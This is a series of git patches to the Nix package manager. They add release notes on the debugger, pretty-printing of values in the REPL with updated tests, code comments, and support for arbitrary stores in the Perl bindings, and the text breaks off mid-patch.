doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md diff --git a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md new file mode 100644 index 000000000..c93225816 --- /dev/null +++ b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md @@ -0,0 +1,25 @@ +--- +synopsis: The `--debugger` will start more reliably in `let` expressions and function calls +prs: 9917 +issues: 6649 +--- + +Previously, if you attempted to evaluate this file with the debugger: + +```nix +let + a = builtins.trace "before inner break" ( + builtins.break "hello" + ); + b = builtins.trace "before outer break" ( + builtins.break a + ); +in + b +``` + +Nix would correctly enter the debugger at `builtins.break a`, but if you asked +it to `:continue`, it would skip over the `builtins.break "hello"` expression +entirely. + +Now, Nix will correctly enter the debugger at both breakpoints. From b63a8d7c46e7a59c3e133c94af24dfcf517fe50b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:15:29 -0800 Subject: [PATCH 401/654] Add release note --- .../rl-next/debugger-locals-for-let-expressions.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/debugger-locals-for-let-expressions.md diff --git a/doc/manual/rl-next/debugger-locals-for-let-expressions.md b/doc/manual/rl-next/debugger-locals-for-let-expressions.md new file mode 100644 index 000000000..736208724 --- /dev/null +++ b/doc/manual/rl-next/debugger-locals-for-let-expressions.md @@ -0,0 +1,9 @@ +--- +synopsis: "`--debugger` can now access bindings from `let` expressions" +prs: 9918 +issues: 8827. +--- + +Breakpoints and errors in the bindings of a `let` expression can now access +those bindings in the debugger. Previously, only the body of `let` expressions +could access those bindings. From 155bc761f601346c8113cc760aaf26306136403c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:16:39 -0800 Subject: [PATCH 402/654] Add release note --- doc/manual/rl-next/reduce-debugger-clutter.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 doc/manual/rl-next/reduce-debugger-clutter.md diff --git a/doc/manual/rl-next/reduce-debugger-clutter.md b/doc/manual/rl-next/reduce-debugger-clutter.md new file mode 100644 index 000000000..9bc902eee --- /dev/null +++ b/doc/manual/rl-next/reduce-debugger-clutter.md @@ -0,0 +1,37 @@ +--- +synopsis: "Visual clutter in `--debugger` is reduced" +prs: 9919 +--- + +Before: +``` +info: breakpoint reached + + +Starting REPL to allow you to inspect the current state of the evaluator. + +Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help. + +nix-repl> :continue +error: uh oh + + +Starting REPL to allow you to inspect the current state of the evaluator. + +Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help. + +nix-repl> +``` + +After: + +``` +info: breakpoint reached + +Nix 2.20.0pre20231222_dirty debugger +Type :? for help. +nix-repl> :continue +error: uh oh + +nix-repl> +``` From 657a6078121bf08525e9cd286c6f8887e983a22e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:21:08 -0800 Subject: [PATCH 403/654] Add release note --- .../rl-next/better-errors-in-nix-repl.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 doc/manual/rl-next/better-errors-in-nix-repl.md diff --git a/doc/manual/rl-next/better-errors-in-nix-repl.md b/doc/manual/rl-next/better-errors-in-nix-repl.md new file mode 100644 index 000000000..4deaa8c70 --- /dev/null +++ b/doc/manual/rl-next/better-errors-in-nix-repl.md @@ -0,0 +1,40 @@ +--- +synopsis: Concise error printing in `nix repl` +prs: 9928 +--- + +Previously, if an element of a list or attribute set threw an error while +evaluating, `nix repl` would print the entire error (including source location +information) inline. This output was clumsy and difficult to parse: + +``` +nix-repl> { err = builtins.throw "uh oh!"; } +{ err = «error: + … while calling the 'throw' builtin + at «string»:1:9: + 1| { err = builtins.throw "uh oh!"; } + | ^ + + error: uh oh!»; } +``` + +Now, only the error message is displayed, making the output much more readable. +``` +nix-repl> { err = builtins.throw "uh oh!"; } +{ err = «error: uh oh!»; } +``` + +However, if the whole expression being evaluated throws an error, source +locations and (if applicable) a stack trace are printed, just like you'd expect: + +``` +nix-repl> builtins.throw "uh oh!" +error: + … while calling the 'throw' builtin + at «string»:1:1: + 1| builtins.throw "uh oh!" + | ^ + + error: uh oh! +``` + From c0a15fb7d03dfb8f53bc6726c414bc88aa362592 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sun, 4 Feb 2024 00:40:30 -0800 Subject: [PATCH 404/654] Pretty-print values in the REPL Pretty-print values in the REPL by printing each item in a list or attrset on a separate line. When possible, single-item lists and attrsets are printed on one line, as long as they don't contain a nested list, attrset, or thunk. Before: ``` { attrs = { a = { b = { c = { }; }; }; }; list = [ 1 ]; list' = [ 1 2 3 ]; } ``` After: ``` { attrs = { a = { b = { c = { }; }; }; }; list = [ 1 ]; list' = [ 1 2 3 ]; } ``` --- src/libcmd/repl.cc | 3 +- src/libexpr/print-options.hh | 22 ++++ src/libexpr/print.cc | 114 ++++++++++++++++-- ...al-fail-bad-string-interpolation-4.err.exp | 2 +- tests/functional/repl.sh | 69 ++++++++++- tests/unit/libexpr/value/print.cc | 8 +- 6 files changed, 195 insertions(+), 23 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7af15153..2c64bd7a6 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -101,7 +101,8 @@ struct NixRepl .ansiColors = true, .force = true, .derivationPaths = true, - .maxDepth = maxDepth + .maxDepth = maxDepth, + .prettyIndent = 2 }); } }; diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index e03746ece..94767df9c 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -17,24 +17,29 @@ struct PrintOptions * If true, output ANSI color sequences. */ bool ansiColors = false; + /** * If true, force values. */ bool force = false; + /** * If true and `force` is set, print derivations as * `«derivation /nix/store/...»` instead of as attribute sets. */ bool derivationPaths = false; + /** * If true, track which values have been printed and skip them on * subsequent encounters. Useful for self-referential values. */ bool trackRepeated = true; + /** * Maximum depth to evaluate to. */ size_t maxDepth = std::numeric_limits::max(); + /** * Maximum number of attributes in attribute sets to print. * @@ -42,6 +47,7 @@ struct PrintOptions * attribute set encountered. */ size_t maxAttrs = std::numeric_limits::max(); + /** * Maximum number of list items to print. * @@ -49,10 +55,26 @@ struct PrintOptions * list encountered. */ size_t maxListItems = std::numeric_limits::max(); + /** * Maximum string length to print. */ size_t maxStringLength = std::numeric_limits::max(); + + /** + * Indentation width for pretty-printing. + * + * If set to 0 (the default), values are not pretty-printed. + */ + size_t prettyIndent = 0; + + /** + * True if pretty-printing is enabled. + */ + inline bool prettyPrint() + { + return prettyIndent > 0; + } }; /** diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 68d381033..1ff026b3d 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -153,6 +153,7 @@ struct ImportantFirstAttrNameCmp }; typedef std::set ValuesSeen; +typedef std::vector> AttrVec; class Printer { @@ -163,6 +164,21 @@ private: std::optional seen; size_t attrsPrinted = 0; size_t listItemsPrinted = 0; + std::string indent; + + void increaseIndent() + { + if (options.prettyPrint()) { + indent.append(options.prettyIndent, ' '); + } + } + + void decreaseIndent() + { + if (options.prettyPrint()) { + indent.resize(indent.size() - options.prettyIndent); + } + } void printRepeated() { @@ -260,6 +276,28 @@ private: } } + bool shouldPrettyPrintAttrs(AttrVec & v) + { + if (!options.prettyPrint() || v.empty()) { + return false; + } + + // Pretty-print attrsets with more than one item. + if (v.size() > 1) { + return true; + } + + auto item = v[0].second; + if (!item) { + return true; + } + + // Pretty-print single-item attrsets only if they contain nested + // structures. + auto itemType = item->type(); + return itemType == nList || itemType == nAttrs || itemType == nThunk; + } + void printAttrs(Value & v, size_t depth) { if (seen && !seen->insert(v.attrs).second) { @@ -270,9 +308,10 @@ private: if (options.force && options.derivationPaths && state.isDerivation(v)) { printDerivation(v); } else if (depth < options.maxDepth) { - output << "{ "; + increaseIndent(); + output << "{"; - std::vector> sorted; + AttrVec sorted; for (auto & i : *v.attrs) sorted.emplace_back(std::pair(state.symbols[i.name], i.value)); @@ -281,7 +320,15 @@ private: else std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); + auto prettyPrint = shouldPrettyPrintAttrs(sorted); + for (auto & i : sorted) { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); break; @@ -290,13 +337,42 @@ private: printAttributeName(output, i.first); output << " = "; print(*i.second, depth + 1); - output << "; "; + output << ";"; attrsPrinted++; } + decreaseIndent(); + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } output << "}"; - } else + } else { output << "{ ... }"; + } + } + + bool shouldPrettyPrintList(std::span list) + { + if (!options.prettyPrint() || list.empty()) { + return false; + } + + // Pretty-print lists with more than one item. + if (list.size() > 1) { + return true; + } + + auto item = list[0]; + if (!item) { + return true; + } + + // Pretty-print single-item lists only if they contain nested + // structures. + auto itemType = item->type(); + return itemType == nList || itemType == nAttrs || itemType == nThunk; } void printList(Value & v, size_t depth) @@ -306,11 +382,20 @@ private: return; } - output << "[ "; if (depth < options.maxDepth) { - for (auto elem : v.listItems()) { + increaseIndent(); + output << "["; + auto listItems = v.listItems(); + auto prettyPrint = shouldPrettyPrintList(listItems); + for (auto elem : listItems) { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + if (listItemsPrinted >= options.maxListItems) { - printElided(v.listSize() - listItemsPrinted, "item", "items"); + printElided(listItems.size() - listItemsPrinted, "item", "items"); break; } @@ -319,13 +404,19 @@ private: } else { printNullptr(); } - output << " "; listItemsPrinted++; } + + decreaseIndent(); + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + output << "]"; + } else { + output << "[ ... ]"; } - else - output << "... "; - output << "]"; } void printFunction(Value & v) @@ -488,6 +579,7 @@ public: { attrsPrinted = 0; listItemsPrinted = 0; + indent.clear(); if (options.trackRepeated) { seen.emplace(); diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 5119238d7..6f907106b 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -6,4 +6,4 @@ error: | ^ 10| - error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided»}; «4294967294 attributes elided»}; «4294967293 attributes elided»} + error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided» }; «4294967294 attributes elided» }; «4294967293 attributes elided» } diff --git a/tests/functional/repl.sh b/tests/functional/repl.sh index 5f399aa44..4938c2267 100644 --- a/tests/functional/repl.sh +++ b/tests/functional/repl.sh @@ -146,29 +146,86 @@ echo "$replResult" | grepQuiet -s afterChange # Normal output should print attributes in lexicographical order non-recursively testReplResponseNoRegex ' { a = { b = 2; }; l = [ 1 2 3 ]; s = "string"; n = 1234; x = rec { y = { z = { inherit y; }; }; }; } -' '{ a = { ... }; l = [ ... ]; n = 1234; s = "string"; x = { ... }; }' +' \ +'{ + a = { ... }; + l = [ ... ]; + n = 1234; + s = "string"; + x = { ... }; +} +' # Same for lists, but order is preserved testReplResponseNoRegex ' [ 42 1 "thingy" ({ a = 1; }) ([ 1 2 3 ]) ] -' '[ 42 1 "thingy" { ... } [ ... ] ]' +' \ +'[ + 42 + 1 + "thingy" + { ... } + [ ... ] +] +' # Same for let expressions testReplResponseNoRegex ' let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = «repeated»; y = { ... }; }' +' \ +'{ + x = { ... }; + y = { ... }; +} +' # The :p command should recursively print sets, but prevent infinite recursion testReplResponseNoRegex ' :p { a = { b = 2; }; s = "string"; n = 1234; x = rec { y = { z = { inherit y; }; }; }; } -' '{ a = { b = 2; }; n = 1234; s = "string"; x = { y = { z = { y = «repeated»; }; }; }; }' +' \ +'{ + a = { b = 2; }; + n = 1234; + s = "string"; + x = { + y = { + z = { + y = «repeated»; + }; + }; + }; +} +' # Same for lists testReplResponseNoRegex ' :p [ 42 1 "thingy" (rec { a = 1; b = { inherit a; inherit b; }; }) ([ 1 2 3 ]) ] -' '[ 42 1 "thingy" { a = 1; b = { a = 1; b = «repeated»; }; } [ 1 2 3 ] ]' +' \ +'[ + 42 + 1 + "thingy" + { + a = 1; + b = { + a = 1; + b = «repeated»; + }; + } + [ + 1 + 2 + 3 + ] +] +' # Same for let expressions testReplResponseNoRegex ' :p let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = «repeated»; y = { a = 1; }; }' +' \ +'{ + x = «repeated»; + y = { a = 1 }; +} +' diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index c4264a38d..db1e4f3a3 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -756,7 +756,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL " }", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -769,7 +769,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL " }", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -793,7 +793,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 2; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL " ]", PrintOptions { .ansiColors = true, .maxListItems = 1 @@ -806,7 +806,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 3; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL " ]", PrintOptions { .ansiColors = true, .maxListItems = 1 From 2d74b56aee84051d386f124c092d143b9cc437f9 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Tue, 6 Feb 2024 23:22:34 +0100 Subject: [PATCH 405/654] fix location of `_redirects` file the Netlify `_redirects` file must be in the root directory [0] of the files to serve, and mdBook copies all the files in `src` that aren't `.md` to the output directory [1]. [0]: https://docs.netlify.com/routing/redirects/ [1]: https://rust-lang.github.io/mdBook/guide/creating.html#source-files --- doc/manual/{ => src}/_redirects | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename doc/manual/{ => src}/_redirects (100%) diff --git a/doc/manual/_redirects b/doc/manual/src/_redirects similarity index 100% rename from doc/manual/_redirects rename to doc/manual/src/_redirects From 474fc4078acbe062fcc31ce91c69c8f33bf00d5f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 6 Feb 2024 16:49:28 -0800 Subject: [PATCH 406/654] Add comments --- src/libexpr/eval-error.cc | 2 +- src/libexpr/eval-error.hh | 30 ++++++++---------------------- 2 files changed, 9 insertions(+), 23 deletions(-) diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc index b9411cbf4..250c59a19 100644 --- a/src/libexpr/eval-error.cc +++ b/src/libexpr/eval-error.cc @@ -91,7 +91,7 @@ void EvalErrorBuilder::debugThrow() // `EvalState` is the only class that can construct an `EvalErrorBuilder`, // and it does so in dynamic storage. This is the final method called on - // any such instancve and must delete itself before throwing the underlying + // any such instance and must delete itself before throwing the underlying // error. auto error = std::move(this->error); delete this; diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh index ee69dce64..711743886 100644 --- a/src/libexpr/eval-error.hh +++ b/src/libexpr/eval-error.hh @@ -56,6 +56,11 @@ public: } }; +/** + * `EvalErrorBuilder`s may only be constructed by `EvalState`. The `debugThrow` + * method must be the final method in any such `EvalErrorBuilder` usage, and it + * handles deleting the object. + */ template class EvalErrorBuilder final { @@ -90,29 +95,10 @@ public: [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs); + /** + * Delete the `EvalErrorBuilder` and throw the underlying exception. + */ [[gnu::noinline, gnu::noreturn]] void debugThrow(); }; -/** - * The size needed to allocate any `EvalErrorBuilder`. - * - * The list of classes here needs to be kept in sync with the list of `template - * class` declarations in `eval-error.cc`. - * - * This is used by `EvalState` to preallocate a buffer of sufficient size for - * any `EvalErrorBuilder` to avoid allocating while evaluating Nix code. - */ -constexpr size_t EVAL_ERROR_BUILDER_SIZE = std::max({ - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), -}); - } From 9723f533d85133fa3c4d9421a58c7765cb61e733 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 6 Feb 2024 16:50:47 -0800 Subject: [PATCH 407/654] Add comment --- src/libexpr/eval.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index afe89cd30..3c7c5da27 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -239,6 +239,7 @@ public: template [[nodiscard, gnu::noinline]] EvalErrorBuilder & error(const Args & ... args) { + // `EvalErrorBuilder::debugThrow` performs the corresponding `delete`. return *new EvalErrorBuilder(*this, args...); } From bc085022494fe90f733aef0832b6d7dcc34709cf Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 15:54:33 -0500 Subject: [PATCH 408/654] Support arbitrary stores in Perl bindings Fix #9859 It's a breaking change but that's fine; we can just update Hydra to use the new bindings. --- perl/.yath.rc | 2 + perl/default.nix | 18 +++- perl/lib/Nix/Store.pm | 19 ++-- perl/lib/Nix/Store.xs | 201 +++++++++++++++++++++++++++--------------- perl/local.mk | 3 + perl/t/init.t | 13 +++ 6 files changed, 171 insertions(+), 85 deletions(-) create mode 100644 perl/.yath.rc create mode 100644 perl/t/init.t diff --git a/perl/.yath.rc b/perl/.yath.rc new file mode 100644 index 000000000..118bf80c8 --- /dev/null +++ b/perl/.yath.rc @@ -0,0 +1,2 @@ +[test] +-I=rel(lib/Nix) diff --git a/perl/default.nix b/perl/default.nix index 4687976a1..7103574c9 100644 --- a/perl/default.nix +++ b/perl/default.nix @@ -5,12 +5,12 @@ , nix, curl, bzip2, xz, boost, libsodium, darwin }: -perl.pkgs.toPerlModule (stdenv.mkDerivation { +perl.pkgs.toPerlModule (stdenv.mkDerivation (finalAttrs: { name = "nix-perl-${nix.version}"; src = fileset.toSource { root = ../.; - fileset = fileset.unions [ + fileset = fileset.unions ([ ../.version ../m4 ../mk @@ -20,7 +20,10 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { ./configure.ac ./lib ./local.mk - ]; + ] ++ lib.optionals finalAttrs.doCheck [ + ./.yath.rc + ./t + ]); }; nativeBuildInputs = @@ -40,6 +43,13 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { ++ lib.optional (stdenv.isLinux || stdenv.isDarwin) libsodium ++ lib.optional stdenv.isDarwin darwin.apple_sdk.frameworks.Security; + # `perlPackages.Test2Harness` is marked broken for Darwin + doCheck = !stdenv.isDarwin; + + nativeCheckInputs = [ + perlPackages.Test2Harness + ]; + configureFlags = [ "--with-dbi=${perlPackages.DBI}/${perl.libPrefix}" "--with-dbd-sqlite=${perlPackages.DBDSQLite}/${perl.libPrefix}" @@ -48,4 +58,4 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { enableParallelBuilding = true; postUnpack = "sourceRoot=$sourceRoot/perl"; -}) +})) diff --git a/perl/lib/Nix/Store.pm b/perl/lib/Nix/Store.pm index 3e4bbee0a..16f2e17c8 100644 --- a/perl/lib/Nix/Store.pm +++ b/perl/lib/Nix/Store.pm @@ -12,17 +12,20 @@ our %EXPORT_TAGS = ( 'all' => [ qw( ) ] ); our @EXPORT_OK = ( @{ $EXPORT_TAGS{'all'} } ); our @EXPORT = qw( - setVerbosity - isValidPath queryReferences queryPathInfo queryDeriver queryPathHash - queryPathFromHashPart - topoSortPaths computeFSClosure followLinksToStorePath exportPaths importPaths + StoreWrapper + StoreWrapper::new + StoreWrapper::isValidPath StoreWrapper::queryReferences StoreWrapper::queryPathInfo StoreWrapper::queryDeriver StoreWrapper::queryPathHash + StoreWrapper::queryPathFromHashPart + StoreWrapper::topoSortPaths StoreWrapper::computeFSClosure followLinksToStorePath StoreWrapper::exportPaths StoreWrapper::importPaths + StoreWrapper::addToStore StoreWrapper::makeFixedOutputPath + StoreWrapper::derivationFromPath + StoreWrapper::addTempRoot + StoreWrapper::queryRawRealisation + hashPath hashFile hashString convertHash signString checkSignature - addToStore makeFixedOutputPath - derivationFromPath - addTempRoot getBinDir getStoreDir - queryRawRealisation + setVerbosity ); our $VERSION = '0.15'; diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 423c01cf7..6730197b5 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -17,47 +17,61 @@ #include #include - using namespace nix; +static bool libStoreInitialized = false; -static ref store() -{ - static std::shared_ptr _store; - if (!_store) { - try { - initLibStore(); - _store = openStore(); - } catch (Error & e) { - croak("%s", e.what()); - } - } - return ref(_store); -} - +struct StoreWrapper { + ref store; +}; MODULE = Nix::Store PACKAGE = Nix::Store PROTOTYPES: ENABLE +TYPEMAP: < _store; try { - RETVAL = store()->isValidPath(store()->parseStorePath(path)); + if (!libStoreInitialized) { + initLibStore(); + libStoreInitialized = true; + } + if (items == 1) { + _store = openStore(); + RETVAL = new StoreWrapper { + .store = ref{_store} + }; + } else { + RETVAL = new StoreWrapper { + .store = openStore(s) + }; + } } catch (Error & e) { croak("%s", e.what()); } @@ -65,52 +79,81 @@ int isValidPath(char * path) RETVAL -SV * queryReferences(char * path) +void init() + CODE: + if (!libStoreInitialized) { + initLibStore(); + libStoreInitialized = true; + } + + +void setVerbosity(int level) + CODE: + verbosity = (Verbosity) level; + + +int +StoreWrapper::isValidPath(char * path) + CODE: + try { + RETVAL = THIS->store->isValidPath(THIS->store->parseStorePath(path)); + } catch (Error & e) { + croak("%s", e.what()); + } + OUTPUT: + RETVAL + + +SV * +StoreWrapper::queryReferences(char * path) PPCODE: try { - for (auto & i : store()->queryPathInfo(store()->parseStorePath(path))->references) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + for (auto & i : THIS->store->queryPathInfo(THIS->store->parseStorePath(path))->references) + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryPathHash(char * path) +SV * +StoreWrapper::queryPathHash(char * path) PPCODE: try { - auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); + auto s = THIS->store->queryPathInfo(THIS->store->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryDeriver(char * path) +SV * +StoreWrapper::queryDeriver(char * path) PPCODE: try { - auto info = store()->queryPathInfo(store()->parseStorePath(path)); + auto info = THIS->store->queryPathInfo(THIS->store->parseStorePath(path)); if (!info->deriver) XSRETURN_UNDEF; - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(*info->deriver).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryPathInfo(char * path, int base32) +SV * +StoreWrapper::queryPathInfo(char * path, int base32) PPCODE: try { - auto info = store()->queryPathInfo(store()->parseStorePath(path)); + auto info = THIS->store->queryPathInfo(THIS->store->parseStorePath(path)); if (!info->deriver) XPUSHs(&PL_sv_undef); else - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(*info->deriver).c_str(), 0))); auto s = info->narHash.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); mXPUSHi(info->registrationTime); mXPUSHi(info->narSize); AV * refs = newAV(); for (auto & i : info->references) - av_push(refs, newSVpv(store()->printStorePath(i).c_str(), 0)); + av_push(refs, newSVpv(THIS->store->printStorePath(i).c_str(), 0)); XPUSHs(sv_2mortal(newRV((SV *) refs))); AV * sigs = newAV(); for (auto & i : info->sigs) @@ -120,10 +163,11 @@ SV * queryPathInfo(char * path, int base32) croak("%s", e.what()); } -SV * queryRawRealisation(char * outputId) +SV * +StoreWrapper::queryRawRealisation(char * outputId) PPCODE: try { - auto realisation = store()->queryRealisation(DrvOutput::parse(outputId)); + auto realisation = THIS->store->queryRealisation(DrvOutput::parse(outputId)); if (realisation) XPUSHs(sv_2mortal(newSVpv(realisation->toJSON().dump().c_str(), 0))); else @@ -133,46 +177,50 @@ SV * queryRawRealisation(char * outputId) } -SV * queryPathFromHashPart(char * hashPart) +SV * +StoreWrapper::queryPathFromHashPart(char * hashPart) PPCODE: try { - auto path = store()->queryPathFromHashPart(hashPart); - XPUSHs(sv_2mortal(newSVpv(path ? store()->printStorePath(*path).c_str() : "", 0))); + auto path = THIS->store->queryPathFromHashPart(hashPart); + XPUSHs(sv_2mortal(newSVpv(path ? THIS->store->printStorePath(*path).c_str() : "", 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * computeFSClosure(int flipDirection, int includeOutputs, ...) +SV * +StoreWrapper::computeFSClosure(int flipDirection, int includeOutputs, ...) PPCODE: try { StorePathSet paths; for (int n = 2; n < items; ++n) - store()->computeFSClosure(store()->parseStorePath(SvPV_nolen(ST(n))), paths, flipDirection, includeOutputs); + THIS->store->computeFSClosure(THIS->store->parseStorePath(SvPV_nolen(ST(n))), paths, flipDirection, includeOutputs); for (auto & i : paths) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * topoSortPaths(...) +SV * +StoreWrapper::topoSortPaths(...) PPCODE: try { StorePathSet paths; - for (int n = 0; n < items; ++n) paths.insert(store()->parseStorePath(SvPV_nolen(ST(n)))); - auto sorted = store()->topoSortPaths(paths); + for (int n = 0; n < items; ++n) paths.insert(THIS->store->parseStorePath(SvPV_nolen(ST(n)))); + auto sorted = THIS->store->topoSortPaths(paths); for (auto & i : sorted) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * followLinksToStorePath(char * path) +SV * +StoreWrapper::followLinksToStorePath(char * path) CODE: try { - RETVAL = newSVpv(store()->printStorePath(store()->followLinksToStorePath(path)).c_str(), 0); + RETVAL = newSVpv(THIS->store->printStorePath(THIS->store->followLinksToStorePath(path)).c_str(), 0); } catch (Error & e) { croak("%s", e.what()); } @@ -180,29 +228,32 @@ SV * followLinksToStorePath(char * path) RETVAL -void exportPaths(int fd, ...) +void +StoreWrapper::exportPaths(int fd, ...) PPCODE: try { StorePathSet paths; - for (int n = 1; n < items; ++n) paths.insert(store()->parseStorePath(SvPV_nolen(ST(n)))); + for (int n = 1; n < items; ++n) paths.insert(THIS->store->parseStorePath(SvPV_nolen(ST(n)))); FdSink sink(fd); - store()->exportPaths(paths, sink); + THIS->store->exportPaths(paths, sink); } catch (Error & e) { croak("%s", e.what()); } -void importPaths(int fd, int dontCheckSigs) +void +StoreWrapper::importPaths(int fd, int dontCheckSigs) PPCODE: try { FdSource source(fd); - store()->importPaths(source, dontCheckSigs ? NoCheckSigs : CheckSigs); + THIS->store->importPaths(source, dontCheckSigs ? NoCheckSigs : CheckSigs); } catch (Error & e) { croak("%s", e.what()); } -SV * hashPath(char * algo, int base32, char * path) +SV * +hashPath(char * algo, int base32, char * path) PPCODE: try { PosixSourceAccessor accessor; @@ -280,64 +331,67 @@ int checkSignature(SV * publicKey_, SV * sig_, char * msg) RETVAL -SV * addToStore(char * srcPath, int recursive, char * algo) +SV * +StoreWrapper::addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; PosixSourceAccessor accessor; - auto path = store()->addToStore( + auto path = THIS->store->addToStore( 